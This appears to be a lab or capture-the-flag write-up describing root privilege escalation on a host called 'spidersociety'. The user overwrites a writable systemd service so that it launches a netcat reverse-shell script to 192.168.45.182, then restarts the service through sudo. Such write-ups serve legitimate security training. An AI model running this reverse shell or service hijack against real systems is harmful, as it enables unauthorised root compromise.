Writable Service with sudo
It has been identified that the spidey user has
- write access to a service;
spiderbackup.service - sudo privilege to reload and restart the
spiderbackup.service
Those conditions allows the user to escalate privileges to the root account.
spidey@spidersociety:/dev/shm$ nano pe.sh
spidey@spidersociety:/dev/shm$ cat pe.sh
#!/bin/bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 192.168.45.182 1234 >/tmp/fCreating a reverse shell script; /dev/shm/pe.sh
spidey@spidersociety:/dev/shm$ nano /etc/systemd/system/spiderbackup.service
spidey@spidersociety:/dev/shm$ cat /etc/systemd/system/spiderbackup.service
[Unit]
Description=Spider Society Backup Service
After=network.target
[Service]
Type=simple
ExecStart=/dev/shm/pe.sh
User=root
Group=root
[Install]
WantedBy=multi-user.targetUpdated the service file to execute the reverse shell script.
spidey@spidersociety:/dev/shm$ sudo -u root /bin/systemctl daemon-reload
spidey@spidersociety:/dev/shm$ sudo -u root /bin/systemctl restart spiderbackup.serviceReloading the updated service file and restarting the spiderbackup.service service.
/Practice/SpiderSociety/5-Privilege_Escalation/attachments/{969C4705-B446-449A-842C-142841120951}.png)
System level compromise.